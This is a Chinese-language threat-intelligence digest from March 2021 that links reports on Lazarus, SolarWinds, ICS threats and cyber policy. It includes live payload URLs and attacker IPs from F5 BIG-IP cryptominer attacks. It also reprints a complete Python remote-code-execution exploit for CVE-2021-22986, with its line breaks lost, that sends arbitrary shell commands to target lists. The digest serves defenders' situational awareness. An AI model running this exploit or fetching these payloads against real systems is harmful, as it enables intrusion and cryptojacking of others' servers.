祝愿各位老哥身体健康
高级威胁分析
1、Lazarus Attack Activities Targeting Japan (VSingle/ValeforBeta),老油条了,样本C2多
https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html
2、11个0day的未知组织攻击活动。这水坑的样子,像极了XXX
https://googleprojectzero.blogspot.com/2021/03/in-wild-series-october-2020-0-day.html
3、卡巴斯基ICS CERT发布了一份报告,其中提供了有关2020年ICS工程和集成领域威胁格局的详细信息。
https://ics-cert.kaspersky.com/reports/2021/03/17/threat-landscape-for-the-ics-engineering-and-integration-sector-2020/
4、CISA发布了一个新工具,该工具可在受到威胁的本地企业环境中检测与SolarWinds黑客相关的恶意活动
https://us-cert.cisa.gov/ncas/alerts/aa21-077a
https://github.com/cisagov/CHIRP/blob/main/README.md
5、新的macOS恶意软件XcodeSpy通过EggShell后门攻击Xcode开发人员,这算是供应链攻击之前?
https://labs.sentinelone.com/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/
技术分享
1、OSINT 俄罗斯在黑海的舰队分布与分析
https://russianfleetanalysis.blogspot.com/2021/03/russian-forces-in-mediterranean-wk112021.html
2、CVE-2021-22986(F5 BIG-IP RCE)挖矿软件XMrig IOC
1er Payload:http://118.107.43.174/upload/files/run.shhttp://118.107.43.174/upload/files/xmrig.tar.gz2do Payload:http://124.158.4.235:8080/docs/nexusa.txthttp://136.243.19.213:8885/docs/config.jsonhttp://222.122.47.27:2143/auth/java.exehttp://27.1.1.34:8080/docs/solr.shIPs origen:45.83.29.58222.108.2.2037.120.194.100176.222.34.116132.145.111.134173.82.240.245176.222.34.116173.237.207.45104.233.164.29139.162.186.12735.235.96.5353.96.235.3513.56.200.22834.82.84.22415.228.52.2545.56.89.14035.203.110.60159.89.150.4045.33.71.63119.236.147.8454.253.20.132157.175.47.2315.236.131.189223.75.252.90185.89.250.18747.75.102.144
https://pastebin.com/DbYKkMmg
3、隐私分享工具
https://github.com/nccgroup/solitude
https://research.nccgroup.com/2021/03/17/tool-release-solitude-a-privacy-analysis-tool/
4、APT团队如何利用隧道
https://www.varonis.com/blog/nmap-reverse-proxies/
5、Finding Metasploit & Cobalt Strike URLs
https://isc.sans.edu/forums/diary/Video+Finding+Metasploit+Cobalt+Strike+URLs/27224/
6、DTLS服务器来放大攻击
https://www.bleepingcomputer.com/news/security/ddos-booters-now-abuse-dtls-servers-to-amplify-attacks/
漏洞相关
1、HW漏洞RCE-Exploit-in-BIG-IP
import requestsimport jsonimport argparseimport reimport jsonimport timefrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)t = int(time.time())def poc_1(target_url, command):print(target_url)headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0','Content-Type': 'application/json','X-F5-Auth-Token': '','Authorization': 'Basic YWRtaW46QVNhc1M='}data = json.dumps({'command': 'run' , 'utilCmdArgs': '-c ' + command})# proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}check_url = target_url + '/mgmt/tm/util/bash'try:r = requests.post(url=check_url, data=data, headers=headers, verify=False, timeout=20)if r.status_code == 200 and 'commandResult' in r.text:default = json.loads(r.text)display = default['commandResult']save_file(target_url, t)print('[+] vulnerable {0}'.format(target_url))print('$ > {0}'.format(display))else:print('[-] Not vulnerable')except Exception as e:print('url dead {0}'.format(target_url))def save_file(target_url, t):output_name = 'Output_{0}.txt'.format(t)f = open(output_name, 'a')f.write(target_url + 'n')f.close()def format_url(url):try:if url[:4] != "http":url = "https://" + urlurl = url.strip()return urlexcept Exception as e:print('URL Error {0}'.format(url))def main():parser = argparse.ArgumentParser("f5 rce poc")parser.add_argument('-u', '--url', type=str, help=' URL ')parser.add_argument('-f', '--file', type=str, help=' File List ')parser.add_argument('-c', '--command', type=str, default="id", help=' execute commands ')args = parser.parse_args()url = args.urlfile = args.filecommand = args.commandif not url is None:target_url = format_url(url)poc_1(target_url, command)elif file != '':for url_link in open(file, 'r', encoding='utf-8'):if url_link.strip() != '':url_path = format_url(url_link.strip())poc_1(url_path, command)else:sys.exit(0)if __name__ == '__main__':main()
https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP
2、值得收藏的漏洞合集,从GitHub汇总了1,481个漏洞/ 1day的漏洞,可满足您所有的BlueTeam,RedTeam
https://vxug.fakedoma.in/tmp/Exploits/
3、xterm RCE,这个牛逼不
https://cvepremium.circl.lu/cve/CVE-2021-27135
4、Apache OFBiz中的RCE漏洞
https://seclists.org/oss-sec/2021/q1/255
5、unit42发现Microsoft,Adobe和Apple产品中的15个新漏洞
https://unit42.paloaltonetworks.com/15-new-vulnerabilities/
网络战与网络情报
1、report
https://www.sri.ro/assets/files/publicatii/buletin-cyber-sem-1-2021.pdf
2、英国针对中俄,SAS 外国情报监控
https://www.telegraph.co.uk/politics/2021/03/20/sas-takes-fight-meddling-russians/
3、开源软件可以在北约的网络防御中发挥关键作用,从情报共享到情报体系化建设。
https://natoassociation.ca/open-source-software-can-play-a-key-role-in-natos-cyber-defences/
4、俄罗斯国民认罪共谋将恶意软件引入美国公司的计算机网络
https://www.justice.gov/opa/pr/russian-national-pleads-guilty-conspiracy-introduce-malware-us-company-s-computer-network
5、论文
https://academic.oup.com/jogss/article-abstract/3/4/402/5092710
6、欧盟网络安全局(ENISA)发布了新指南,以便利国家电信安全部门报告安全事件。
https://www.enisa.europa.eu/news/enisa-news/when-how-to-report-security-incidents
7、SolarWinds参议院听证会:安全管理员的五个安全防护要点
https://www.csoonline.com/article/3610693/the-solarwinds-senate-hearing-5-key-takeaways-for-security-admins.html
8、欧盟理事会总结了欧盟的网络安全战略。这个报告很重要,特别是欧盟最近对中俄有其他意见和看法。
https://www.consilium.europa.eu/en/press/press-releases/2021/03/22/cybersecurity-council-adopts-conclusions-on-the-eu-s-cybersecurity-strategy/
https://data.consilium.europa.eu/doc/document/ST-6722-2021-INIT/en/pdf
本文始发于微信公众号(ThreatPage全球威胁情报):今日威胁情报2021/3/19-22(第360期)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论